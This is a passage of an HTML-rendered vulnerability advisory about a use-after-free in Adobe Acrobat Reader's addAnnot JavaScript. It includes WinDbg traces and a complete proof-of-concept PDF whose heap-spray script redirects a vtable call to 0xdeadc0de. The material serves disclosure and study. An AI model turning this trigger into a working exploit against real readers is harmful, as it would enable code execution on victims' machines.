destructor<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>Debugging poc.pdf with Windbg and the breakpoints from above will give you following output:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598b8a5d1440e645967001\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 0:012&gt; bp EScript+0x137ca3 &#8220;.printf &#8220;log: %mu\\r\\n&#8221;, poi(poi(poi(esp+c)+10)+4); g&#8221;  0:012&gt; bp AcroRd32.dll+0x111351 &#8220;.printf &#8220;created Stream object @ 0x%x\\r\\n&#8221;, eax; g&#8221;  0:012&gt; bp AcroRd32.dll+0x116ABE &#8220;.printf &#8220;destroy Stream object @ 0x%x\\r\\n&#8221;, esi; g&#8221;    0:012&gt; g  log: [obj1_read], get read property  log: [obj1_write], get write property  created Stream object @ 0x826fbb0  log: [obj2_read], get read property  log: [obj2_write], get write property  created Stream object @ 0x826f100\t\/\/ [1]  log: [obj2_read], get read property  destroy Stream object @ 0x826f100\t\/\/ [2]  log: [obj1_read], get read property  destroy Stream object @ 0x826fbb0    (3f44.20b0): Access violation &#8211; code c0000005 (first chance)  First chance exceptions are reported before any exception handling.  This exception may be expected and handled.  eax=09025940 ebx=00f0c8b0 ecx=deadc0c6 edx=00000016 esi=093094f8 edi=07666460  eip=5f5ed95d esp=00f0b860 ebp=00f0b864 iopl=0         nv up ei pl nz na po nc  cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202  AcroRd32_5f580000!AcroWinMainSandbox+0x1e4d5:    5f5ed95d ff5118          call    dword ptr [ecx+18h]  ds:002b:deadc0de=????????  [3]    0:000&gt; dd eax-8  0826f100  aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa  0826f110  aaaaaaaa aaaaaaaa deadc0c6 eeeeeeee  0826f120  eeeeeeee eeeeeeee eeeeeeee eeeeeeee  0826f130  eeeeeeee eeeeeeee eeeeeeee eeeeeeee<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440e645967001-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440e645967001-31\">31<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-1\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">012<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bp <\/span><span class=\"crayon-v\">EScript<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x137ca3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;.printf &#8220;log: %mu\\r\\n&#8221;, poi(poi(poi(esp+c)+10)+4); g&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-2\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">012<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bp <\/span><span class=\"crayon-v\">AcroRd32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">dll<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x111351<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;.printf &#8220;created Stream object @ 0x%x\\r\\n&#8221;, eax; g&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-3\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">012<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bp <\/span><span class=\"crayon-v\">AcroRd32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">dll<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x116ABE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;.printf &#8220;destroy Stream object @ 0x%x\\r\\n&#8221;, esi; g&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-5\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">012<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">g<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-6\"><span class=\"crayon-v\">log<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">obj1_read<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get <\/span><span class=\"crayon-e\">read <\/span><span class=\"crayon-m\">property<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-7\"><span class=\"crayon-v\">log<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">obj1_write<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get <\/span><span class=\"crayon-e\">write <\/span><span class=\"crayon-m\">property<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-8\"><span class=\"crayon-e\">created <\/span><span class=\"crayon-e\">Stream <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x826fbb0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-9\"><span class=\"crayon-v\">log<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">obj2_read<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get <\/span><span class=\"crayon-e\">read <\/span><span class=\"crayon-m\">property<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-10\"><span class=\"crayon-v\">log<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">obj2_write<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get <\/span><span class=\"crayon-e\">write <\/span><span class=\"crayon-m\">property<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-11\"><span class=\"crayon-e\">created <\/span><span class=\"crayon-e\">Stream <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x826f100<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/ [1]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-12\"><span class=\"crayon-v\">log<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">obj2_read<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get <\/span><span class=\"crayon-e\">read <\/span><span class=\"crayon-m\">property<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-13\"><span class=\"crayon-e\">destroy <\/span><span class=\"crayon-e\">Stream <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x826f100<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/ [2]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-14\"><span class=\"crayon-v\">log<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">obj1_read<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get <\/span><span class=\"crayon-e\">read <\/span><span class=\"crayon-m\">property<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-15\"><span class=\"crayon-e\">destroy <\/span><span class=\"crayon-e\">Stream <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x826fbb0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-17\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">3f44.20b0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Access <\/span><span class=\"crayon-v\">violation<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">code <\/span><span class=\"crayon-e\">c0000005<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">first <\/span><span class=\"crayon-v\">chance<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-18\"><span class=\"crayon-e\">First <\/span><span class=\"crayon-e\">chance <\/span><span class=\"crayon-e\">exceptions <\/span><span class=\"crayon-e\">are <\/span><span class=\"crayon-e\">reported <\/span><span class=\"crayon-e\">before <\/span><span class=\"crayon-e\">any <\/span><span class=\"crayon-e\">exception <\/span><span class=\"crayon-v\">handling<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-19\"><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exception <\/span><span class=\"crayon-e\">may <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">expected <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">handled<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-20\"><span class=\"crayon-v\">eax<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">09025940<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ebx<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00f0c8b0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ecx<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">deadc0c6 <\/span><span class=\"crayon-v\">edx<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00000016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">esi<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">093094f8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">edi<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">07666460<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-21\"><span class=\"crayon-v\">eip<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">5f5ed95d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">esp<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00f0b860<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ebp<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00f0b864<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iopl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">nv <\/span><span class=\"crayon-e\">up <\/span><span class=\"crayon-e\">ei <\/span><span class=\"crayon-e\">pl <\/span><span class=\"crayon-e\">nz <\/span><span class=\"crayon-e\">na <\/span><span class=\"crayon-e\">po <\/span><span class=\"crayon-e\">nc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-22\"><span class=\"crayon-v\">cs<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0023<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ss<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ds<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">es<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fs<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0053<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">gs<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">efl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00010202<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-23\"><span class=\"crayon-v\">AcroRd32_5f580000<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">AcroWinMainSandbox<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1e4d5<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-25\"><span class=\"crayon-cn\">5f5ed95d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ff5118&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">call&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">dword <\/span><span class=\"crayon-i\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">ecx<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">18h<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ds<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">deadc0de<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-27\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">000<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dd <\/span><span class=\"crayon-v\">eax<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-28\"><span class=\"crayon-cn\">0826f100<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">aaaaaaaa <\/span><span class=\"crayon-e\">aaaaaaaa <\/span><span class=\"crayon-e\">aaaaaaaa <\/span><span class=\"crayon-i\">aaaaaaaa<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-29\"><span class=\"crayon-cn\">0826f110<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">aaaaaaaa <\/span><span class=\"crayon-e\">aaaaaaaa <\/span><span class=\"crayon-e\">deadc0c6 <\/span><span class=\"crayon-i\">eeeeeeee<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440e645967001-30\"><span class=\"crayon-cn\">0826f120<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">eeeeeeee <\/span><span class=\"crayon-e\">eeeeeeee <\/span><span class=\"crayon-e\">eeeeeeee <\/span><span class=\"crayon-i\">eeeeeeee<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440e645967001-31\"><span class=\"crayon-cn\">0826f130<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">eeeeeeee <\/span><span class=\"crayon-e\">eeeeeeee <\/span><span class=\"crayon-e\">eeeeeeee <\/span><span class=\"crayon-v\">eeeeeeee<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<p>In the debug log we can identify the allocation [1], destruction [2] and re-use [3] of the Stream object and the controlled vtable call at address <em>0xdead0cde<\/em>.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><u>PoC.pdf<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598b8a5d14412810637220\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> %PDF-1.1    1 0 obj  &lt;&lt;   \/Type \/Catalog   \/Outlines 2 0 R   \/Pages 3 0 R   \/OpenAction 7 0 R  &gt;&gt;  endobj    2 0 obj  &lt;&lt;   \/Type \/Outlines   \/Count 0  &gt;&gt;  endobj    3 0 obj  &lt;&lt;   \/Type \/Pages   \/Kids [4 0 R]   \/Count 1  &gt;&gt;  endobj    4 0 obj  &lt;&lt;   \/Type \/Page   \/Parent 3 0 R   \/MediaBox [0 0 612 792]   \/Contents 5 0 R   \/Resources &lt;&lt;  \t\t\t \/ProcSet [\/PDF \/Text]  \t\t\t \/Font &lt;&lt; \/F1 6 0 R &gt;&gt;  \t\t\t&gt;&gt;  &gt;&gt;  endobj    5 0 obj  &lt;&lt; \/Length 56 &gt;&gt;  stream  BT \/F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET  endstream  endobj    6 0 obj  &lt;&lt;   \/Type \/Font   \/Subtype \/Type1   \/Name \/F1   \/BaseFont \/Helvetica   \/Encoding \/MacRomanEncoding  &gt;&gt;  endobj    7 0 obj  &lt;&lt;   \/Type \/Action   \/S \/JavaScript   \/JS (  console.show();  function log(s) {   \tconsole.println(&#8220;-&gt; &#8221; + s.toString());   \tMath.atan(s.toString());  }    function ptr2str(ptr)  {  \t\/*  \tin: pointer  \tout: 2-char string which represents this pointer on the heap  \t*\/  \tp1 = (((ptr &gt;&gt; 24) &gt;&gt;&gt; 0) &amp; 0xff).toString(16);  \tif(p1.length == 1) p1 = &#8220;0&#8221; + p1;  \tp2 = ((ptr &gt;&gt; 16) &amp; 0xff).toString(16);  \tif(p2.length == 1) p2 = &#8220;0&#8221; + p2;  \tp3 = ((ptr &gt;&gt; 8) &amp; 0xff).toString(16);  \tif(p3.length == 1) p3 = &#8220;0&#8221; + p3;  \tp4 = (ptr &amp; 0xff).toString(16);  \tif(p4.length == 1) p4 = &#8220;0&#8221; + p4;  \treturn eval(&#8220;unescape(&#8216;%u&#8221; + p3+p4 + &#8220;%u&#8221; + p1+p2 + &#8220;&#8216;)&#8221;);  }    basestring = unescape(&#8220;%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa&#8221;) + ptr2str(0xdeadc0de &#8211; 0x18);  while(basestring.length &lt; 0x100) basestring += unescape(&#8220;%ueeee&#8221;);    function allocs(count, size, basestring)  {  \tarr = [];  \tfor(var i=0; i &lt; count; i++) arr.push(basestring.substr(0, (size &#8211; 2) \/ 2).toUpperCase());  \treturn arr;  }    globarr = [];    function somefunc(){}    function obj1_read()  {  \tlog(&#8220;[obj1_read], get read property&#8221;);  \tglobarr.push(allocs(0x200, 0x88, basestring));  \treturn undefined;  }    function obj1_write()  {  \tlog(&#8220;[obj1_write], get write property&#8221;);  \treturn somefunc;  }    function obj2_read()  {  \tlog(&#8220;[obj2_read], get read property&#8221;);  \treturn undefined;  }    function obj2_write()  {  \tlog(&#8220;[obj2_write], get write property&#8221;);  \treturn somefunc;  }    obj1 = new Object();  obj1.__defineGetter__(&#8220;read&#8221;, obj1_read);  obj1.__defineGetter__(&#8220;write&#8221;, obj1_write);  obj2 = new Object();  obj2.__defineGetter__(&#8220;read&#8221;, obj2_read);  obj2.__defineGetter__(&#8220;write&#8221;, obj2_write);    app.alert(&#8220;crash @ 0xdeadc0de&#8221;);  this.addAnnot( { &#8220;name&#8221; : obj1, &#8220;rect&#8221; : obj2, &#8220;type&#8221; : &#8220;Highlight&#8221;});  app.alert(&#8220;no crash!&#8221;);    )  &gt;&gt;  endobj    xref  0 8  0000000000 65535 f  0000000012 00000 n  0000000109 00000 n  0000000165 00000 n  0000000234 00000 n  0000000412 00000 n  